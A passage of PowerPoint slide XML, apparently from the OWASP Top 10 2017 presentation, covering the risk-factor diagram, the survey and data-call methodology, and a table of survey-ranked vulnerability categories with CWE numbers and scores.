            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219200" y="2262187"/>
            <a:ext cx="4887049" cy="565291"/>
            <a:chOff x="430949" y="1049627"/>
            <a:chExt cx="5604445" cy="631782"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2991920"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216000" rIns="36000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Weakness</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="586848" y="1072154"/>
              <a:ext cx="139703" cy="304798"/>
              <a:chOff x="324" y="1497"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Oval 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="372" y="1497"/>
                <a:ext cx="192" cy="192"/>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50" name="Line 65"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="468" y="1689"/>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1" name="Line 66"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="324" y="1929"/>
                <a:ext cx="144" cy="192"/>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2" name="Line 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="468" y="1929"/>
                <a:ext cx="144" cy="192"/>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3" name="Line 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="324" y="1785"/>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41"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r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Vectors</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5411940" y="1049627"/>
              <a:ext cx="623454" cy="428655"/>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18000" rIns="18000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Impacts</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="43" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="829115" y="1262418"/>
              <a:ext cx="441766" cy="123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45" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="42" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4012288" y="1263955"/>
              <a:ext cx="1399652" cy="42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sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="430949" y="1348251"/>
              <a:ext cx="572938" cy="333158"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="36000" rIns="36000">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Threat</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Agents</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="44" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="39" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2188570" y="1263652"/>
              <a:ext cx="803350" cy="725"/>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7" name="AutoShape 117"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3457584" y="2283884"/>
            <a:ext cx="192106" cy="340902"/>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83" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="2627763"/>
            <a:ext cx="718782"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Business</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Textplatzhalter 1"/>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+RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Details About Risk Factors</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRP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14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B246788-8483-43FD-BCB2-20B1833ED144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2048838806"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="987552"/>
          <a:ext cx="6858000" cy="8159611"/>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3869">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Overview</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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552028">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>At the OWASP Project Summit, active participants and community members decided on a vulnerability view, with up to two (2) forward looking vulnerability classes, with ordering defined partially by quantitative data, and partially by qualitative surveys.</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44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noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Industry Ranked Survey</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3310670">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>For the survey, we collected the vulnerability categories that had been previously identified as being “on the cusp” or were mentioned in feedback to 2017 RC1 on the Top 10 mailing list. We put them into a ranked survey and asked respondents to rank the top four vulnerabilities that they felt should be included in the OWASP Top 10 - 2017. The survey was open from</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Aug 2 – Sep 18, 2017. 516 responses were collected and the vulnerabilities were ranked.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r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exposure of Private Information is clearly the highest-ranking vulnerability, but fits very easily as an additional emphasis into the existing </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A3:2017-Sensitive Data Exposure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Cryptographic Failures can fit within Sensitive Data Exposure. Insecure deserialization was ranked at number three, so it was added to the Top 10 as </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1">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A8:2017-Insecure Deserialization</a:t>
                      </a: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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>after risk rating. The fourth ranked User-Controlled Key is included in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017-Broken Access Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>; it is good to see it rank highly on the survey, as there is not much data relating to authorization vulnerabilities. The number five ranked category in the survey is Insufficient Logging and Monitoring, which we believe is a good fit for the Top 10 list, which is why it has become </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient Logging &amp; Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. We have moved to a point where applications need to be able to define what may be an attack and generate appropriate logging, alerting, escalation and response. </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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3344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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Public Data Call</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin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44163525"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3291073">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Traditionally, the data collected and analyzed was more along the lines of frequency data: how many vulnerabilities were found in tested applications. As is well known, tools traditionally report all instances found of a vulnerability and humans traditionally report a single finding with a number of examples. This makes it very difficult to aggregate the two styles of reporting in a comparable manner.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>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r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>For 2017, the incidence rate was calculated by how many applications in a given data set had one or more of a specific vulnerability type. The data from many larger contributors was provided in two views. The first was the traditional frequency style of counting every instance found of a vulnerability, while the second was the count of applications in which each vulnerability was found in (one or more times). While not perfect, this reasonably allows us to compare the data from Human Assisted Tools and Tool Assisted Humans. The raw data and analysis work is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7"/>
                        </a:rPr>
                        <a:t>available in GitHub</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We intend to expand on this with additional structure for future versions of the Top 10.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>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r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We received 40+ submissions in the call for data, and because many were from the original data call that was focused on frequency, we were able to use data from 23 contributors covering ~114,000 applications. We used a one-year block of time where possible and identified by the contributor. The majority of applications are unique, though we acknowledge the likelihood of some repeat applications between the yearly data from Veracode. The 23 data sets used were either identified as tool assisted human testing or specifically provided incidence rate from human assisted tools. Anomalies in the selected data of 100%+ incidence were adjusted down to 100% max. To calculate the incidence rate, we calculated the percentage of the total applications there were found to contain each vulnerability type. The ranking of incidence was used for the prevalence calculation in the overall risk for ranking the Top 10. </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3889179698"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>+DAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Methodology and Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="641151158"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="495299" y="2972577"/>
          <a:ext cx="5867402" cy="1194378"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="338504">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4995497">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="533401">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rank</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="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b="1" i="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Survey Vulnerability Categories</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="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b="1" i="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Score</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="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199063">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1</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Exposure of Private Information ('Privacy Violation') [CWE-359]</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748</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99063">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2</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Cryptographic Failures [CWE-310/311/312/326/327]</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584</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99063">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3</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Deserialization of Untrusted Data [CWE-502]</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514</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99063">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4</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Authorization Bypass Through User-Controlled Key (IDOR* &amp; Path Traversal) [CWE-639]</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493</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199063">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5</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Insufficient Logging and Monitoring [CWE-223 / CWE-778]</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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>440</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35327902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sz="3500" dirty="0"/>
              <a:t>+ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
